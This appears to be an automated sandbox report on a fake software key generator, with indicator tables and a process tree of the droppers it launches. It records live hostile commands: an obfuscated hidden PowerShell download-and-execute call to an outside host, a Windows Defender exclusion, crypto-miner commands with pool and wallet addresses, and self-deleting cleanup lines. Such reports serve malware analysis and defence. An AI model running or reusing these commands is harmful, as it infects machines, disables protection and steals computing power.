Script User-Agent 6 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	296	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	480	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	483	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	136	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	139	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	286	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
3288	setups.tmp
3288	setups.tmp
4568	rundll32.exe
4568	rundll32.exe
1380	svchost.exe
1380	svchost.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe
632	multitimer.exe

Suspicious use of AdjustPrivilegeToken 60 IoCs

description	pid	Process
Token: SeDebugPrivilege	2880	Setup.exe
Token: SeCreateTokenPrivilege	3292	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	3292	askinstall20.exe
Token: SeLockMemoryPrivilege	3292	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	3292	askinstall20.exe
Token: SeMachineAccountPrivilege	3292	askinstall20.exe
Token: SeTcbPrivilege	3292	askinstall20.exe
Token: SeSecurityPrivilege	3292	askinstall20.exe
Token: SeTakeOwnershipPrivilege	3292	askinstall20.exe
Token: SeLoadDriverPrivilege	3292	askinstall20.exe
Token: SeSystemProfilePrivilege	3292	askinstall20.exe
Token: SeSystemtimePrivilege	3292	askinstall20.exe
Token: SeProfSingleProcessPrivilege	3292	askinstall20.exe
Token: SeIncBasePriorityPrivilege	3292	askinstall20.exe
Token: SeCreatePagefilePrivilege	3292	askinstall20.exe
Token: SeCreatePermanentPrivilege	3292	askinstall20.exe
Token: SeBackupPrivilege	3292	askinstall20.exe
Token: SeRestorePrivilege	3292	askinstall20.exe
Token: SeShutdownPrivilege	3292	askinstall20.exe
Token: SeDebugPrivilege	3292	askinstall20.exe
Token: SeAuditPrivilege	3292	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	3292	askinstall20.exe
Token: SeChangeNotifyPrivilege	3292	askinstall20.exe
Token: SeRemoteShutdownPrivilege	3292	askinstall20.exe
Token: SeUndockPrivilege	3292	askinstall20.exe
Token: SeSyncAgentPrivilege	3292	askinstall20.exe
Token: SeEnableDelegationPrivilege	3292	askinstall20.exe
Token: SeManageVolumePrivilege	3292	askinstall20.exe
Token: SeImpersonatePrivilege	3292	askinstall20.exe
Token: SeCreateGlobalPrivilege	3292	askinstall20.exe
Token: 31	3292	askinstall20.exe
Token: 32	3292	askinstall20.exe
Token: 33	3292	askinstall20.exe
Token: 34	3292	askinstall20.exe
Token: 35	3292	askinstall20.exe
Token: SeDebugPrivilege	3316	taskkill.exe
Token: SeDebugPrivilege	632	multitimer.exe
Token: SeDebugPrivilege	2204	MicrosoftEdge.exe
Token: SeDebugPrivilege	2204	MicrosoftEdge.exe
Token: SeDebugPrivilege	2204	MicrosoftEdge.exe
Token: SeDebugPrivilege	2204	MicrosoftEdge.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeTcbPrivilege	1380	svchost.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	4568	rundll32.exe
Token: SeDebugPrivilege	4604	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4604	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4604	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4604	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2192	multitimer.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1372	setups.exe
3288	setups.tmp
2204	MicrosoftEdge.exe
4452	MicrosoftEdgeCP.exe
4452	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 880 wrote to memory of 3300	880	Mbaxp.1.4.9.key.generator.exe	79
PID 880 wrote to memory of 3300	880	Mbaxp.1.4.9.key.generator.exe	79
PID 880 wrote to memory of 3300	880	Mbaxp.1.4.9.key.generator.exe	79
PID 3300 wrote to memory of 3120	3300	cmd.exe	82
PID 3300 wrote to memory of 3120	3300	cmd.exe	82
PID 3300 wrote to memory of 3120	3300	cmd.exe	82
PID 3300 wrote to memory of 2120	3300	cmd.exe	83
PID 3300 wrote to memory of 2120	3300	cmd.exe	83
PID 3300 wrote to memory of 2120	3300	cmd.exe	83
PID 3300 wrote to memory of 1236	3300	cmd.exe	84
PID 3300 wrote to memory of 1236	3300	cmd.exe	84
PID 3300 wrote to memory of 1236	3300	cmd.exe	84
PID 3300 wrote to memory of 1472	3300	cmd.exe	85
PID 3300 wrote to memory of 1472	3300	cmd.exe	85
PID 3300 wrote to memory of 1472	3300	cmd.exe	85
PID 1472 wrote to memory of 2880	1472	keygen-step-4.exe	86
PID 1472 wrote to memory of 2880	1472	keygen-step-4.exe	86
PID 3120 wrote to memory of 1460	3120	keygen-pr.exe	87
PID 3120 wrote to memory of 1460	3120	keygen-pr.exe	87
PID 3120 wrote to memory of 1460	3120	keygen-pr.exe	87
PID 1460 wrote to memory of 1588	1460	key.exe	88
PID 1460 wrote to memory of 1588	1460	key.exe	88
PID 1460 wrote to memory of 1588	1460	key.exe	88
PID 1236 wrote to memory of 3212	1236	keygen-step-3.exe	89
PID 1236 wrote to memory of 3212	1236	keygen-step-3.exe	89
PID 1236 wrote to memory of 3212	1236	keygen-step-3.exe	89
PID 3212 wrote to memory of 3016	3212	cmd.exe	91
PID 3212 wrote to memory of 3016	3212	cmd.exe	91
PID 3212 wrote to memory of 3016	3212	cmd.exe	91
PID 2880 wrote to memory of 632	2880	Setup.exe	92
PID 2880 wrote to memory of 632	2880	Setup.exe	92
PID 2880 wrote to memory of 1372	2880	Setup.exe	93
PID 2880 wrote to memory of 1372	2880	Setup.exe	93
PID 2880 wrote to memory of 1372	2880	Setup.exe	93
PID 1472 wrote to memory of 3292	1472	keygen-step-4.exe	94
PID 1472 wrote to memory of 3292	1472	keygen-step-4.exe	94
PID 1472 wrote to memory of 3292	1472	keygen-step-4.exe	94
PID 1372 wrote to memory of 3288	1372	setups.exe	95
PID 1372 wrote to memory of 3288	1372	setups.exe	95
PID 1372 wrote to memory of 3288	1372	setups.exe	95
PID 3292 wrote to memory of 1352	3292	askinstall20.exe	96
PID 3292 wrote to memory of 1352	3292	askinstall20.exe	96
PID 3292 wrote to memory of 1352	3292	askinstall20.exe	96
PID 1352 wrote to memory of 3316	1352	cmd.exe	98
PID 1352 wrote to memory of 3316	1352	cmd.exe	98
PID 1352 wrote to memory of 3316	1352	cmd.exe	98
PID 1472 wrote to memory of 4284	1472	keygen-step-4.exe	103
PID 1472 wrote to memory of 4284	1472	keygen-step-4.exe	103
PID 1472 wrote to memory of 4284	1472	keygen-step-4.exe	103
PID 4284 wrote to memory of 4360	4284	Full_Version.exe	104
PID 4284 wrote to memory of 4360	4284	Full_Version.exe	104
PID 4284 wrote to memory of 4360	4284	Full_Version.exe	104
PID 1472 wrote to memory of 4384	1472	keygen-step-4.exe	105
PID 1472 wrote to memory of 4384	1472	keygen-step-4.exe	105
PID 1472 wrote to memory of 4384	1472	keygen-step-4.exe	105
PID 4360 wrote to memory of 4568	4360	WScript.exe	107
PID 4360 wrote to memory of 4568	4360	WScript.exe	107
PID 4360 wrote to memory of 4568	4360	WScript.exe	107
PID 4384 wrote to memory of 4684	4384	file.exe	109
PID 4384 wrote to memory of 4684	4384	file.exe	109
PID 4384 wrote to memory of 4756	4384	file.exe	110
PID 4384 wrote to memory of 4756	4384	file.exe	110
PID 4384 wrote to memory of 4756	4384	file.exe	110
PID 4568 wrote to memory of 1380	4568	rundll32.exe	69

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1172

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2744

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2736

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2644

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2556

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2504

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1860

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1304

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1112

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1032

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1012

C:\Users\Admin\AppData\Local\Temp\Mbaxp.1.4.9.key.generator.exe
"C:\Users\Admin\AppData\Local\Temp\Mbaxp.1.4.9.key.generator.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3300
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3120
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1460
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:1588
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:2120
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1236
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3212
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:3016
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1472
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2880
    - - C:\Users\Admin\AppData\Local\Temp\CAJJE2RPKI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CAJJE2RPKI\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Maps connected drives based on registry
        Drops file in Windows directory
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:632
      - C:\Users\Admin\AppData\Local\Temp\CAJJE2RPKI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CAJJE2RPKI\multitimer.exe" 1 3.1617513192.60694ae83bb87 101
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4336
        
        C:\Users\Admin\AppData\Local\Temp\CAJJE2RPKI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CAJJE2RPKI\multitimer.exe" 2 3.1617513192.60694ae83bb87
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\0q5zh1bk13o\41d2jrsgpx4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0q5zh1bk13o\41d2jrsgpx4.exe" /ustwo INSTALL
        8⤵
        
        PID:5988
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "41d2jrsgpx4.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\0q5zh1bk13o\41d2jrsgpx4.exe" & exit
        9⤵
        
        PID:3372
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "41d2jrsgpx4.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:6620
        
        C:\Users\Admin\AppData\Local\Temp\yr3k5rj32tq\jmrpwozxbhv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yr3k5rj32tq\jmrpwozxbhv.exe" /VERYSILENT
        8⤵
        
        PID:6008
        
        C:\Users\Admin\AppData\Local\Temp\is-F60VJ.tmp\jmrpwozxbhv.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-F60VJ.tmp\jmrpwozxbhv.tmp" /SL5="$30342,2592217,780800,C:\Users\Admin\AppData\Local\Temp\yr3k5rj32tq\jmrpwozxbhv.exe" /VERYSILENT
        9⤵
        
        PID:5400
        
        C:\Users\Admin\AppData\Local\Temp\is-J3527.tmp\winlthsth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-J3527.tmp\winlthsth.exe"
        10⤵
        
        PID:5328
        
        C:\Users\Admin\AppData\Local\Temp\I5Zo6Pcbx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\I5Zo6Pcbx.exe"
        11⤵
        
        PID:7224
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        12⤵
        
        PID:7528
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif
        12⤵
        
        PID:5044
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        13⤵
        
        PID:6464
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:5704
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:7760
        
        C:\Users\Admin\AppData\Local\Temp\nxrl1ykgu4r\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nxrl1ykgu4r\cpyrix.exe" /VERYSILENT
        8⤵
        
        PID:5976
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        9⤵
        
        PID:5712
        
        C:\Users\Admin\AppData\Local\Temp\ab9380ee-c439-458a-beec-d8c614fbec4b\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ab9380ee-c439-458a-beec-d8c614fbec4b\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ab9380ee-c439-458a-beec-d8c614fbec4b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        10⤵
        
        PID:7052
        
        C:\Users\Admin\AppData\Local\Temp\ab9380ee-c439-458a-beec-d8c614fbec4b\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ab9380ee-c439-458a-beec-d8c614fbec4b\AdvancedRun.exe" /SpecialRun 4101d8 7052
        11⤵
        
        PID:5740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        10⤵
        
        PID:4596
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        10⤵
        
        PID:6940
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        11⤵
        Delays execution with timeout.exe
        
        PID:7032
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        10⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 1756
        10⤵
        Program crash
        
        PID:6316
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        9⤵
        
        PID:3960
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        10⤵
        
        PID:4144
        
        C:\Users\Admin\AppData\Local\Temp\ro5sqjvwf12\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ro5sqjvwf12\app.exe" /8-23
        8⤵
        
        PID:6136
        
        C:\Users\Admin\AppData\Local\Temp\42hsfaeb0lx\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\42hsfaeb0lx\vpn.exe" /silent /subid=482
        8⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\is-QJBBL.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-QJBBL.tmp\vpn.tmp" /SL5="$1037C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\42hsfaeb0lx\vpn.exe" /silent /subid=482
        9⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:5816
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:1908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:6548
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:4168
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:4248
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:7616
        
        C:\Users\Admin\AppData\Local\Temp\bpij1yyim32\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bpij1yyim32\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\is-854UD.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-854UD.tmp\IBInstaller_97039.tmp" /SL5="$1037A,14575144,721408,C:\Users\Admin\AppData\Local\Temp\bpij1yyim32\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        
        PID:5520
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-LH4NJ.tmp\{app}\microsoft.cab -F:* %ProgramData%
        10⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\expand.exe
        
        expand C:\Users\Admin\AppData\Local\Temp\is-LH4NJ.tmp\{app}\microsoft.cab -F:* C:\ProgramData
        11⤵
        
        PID:3796
        
        C:\Users\Admin\AppData\Local\Temp\phfecgbojni\g4xauwrushu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\phfecgbojni\g4xauwrushu.exe" /quiet SILENT=1 AF=756
        8⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\phfecgbojni\g4xauwrushu.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\phfecgbojni\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617260850 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        9⤵
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\3qvvyeemdzy\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3qvvyeemdzy\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:6116
        
        C:\Users\Admin\AppData\Local\Temp\4w4qv5xqf1n\iutmvh1rhsd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4w4qv5xqf1n\iutmvh1rhsd.exe"
        8⤵
        
        PID:6104
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4w4qv5xqf1n\iutmvh1rhsd.exe"
        9⤵
        
        PID:5932
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        10⤵
        Runs ping.exe
        
        PID:2904
        
        C:\Users\Admin\AppData\Local\Temp\r3t1pneez0p\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\r3t1pneez0p\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:6092
    - - C:\Users\Admin\AppData\Local\Temp\T9FBJCS8E4\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\T9FBJCS8E4\setups.exe" ll
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1372
      - C:\Users\Admin\AppData\Local\Temp\is-NVM32.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-NVM32.tmp\setups.tmp" /SL5="$2020C,635399,250368,C:\Users\Admin\AppData\Local\Temp\T9FBJCS8E4\setups.exe" ll
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3288
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3292
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1352
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3316
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:4284
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4360
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        6⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4568
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4384
    - - C:\Users\Admin\AppData\Roaming\FBF9.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\FBF9.tmp.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4684
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:4924
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:4796
    - - C:\Users\Admin\AppData\Roaming\FD52.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\FD52.tmp.exe"
        5⤵
        Executes dropped EXE
        
        PID:4756
      - C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\FD52.tmp.exe
        6⤵
        
        PID:8092
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:5016
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
        5⤵
        
        PID:2292
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:2600
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
      4⤵
      Executes dropped EXE
      PID:4376
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
      4⤵
      PID:6880

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:4820

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2204

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3508

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4452

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
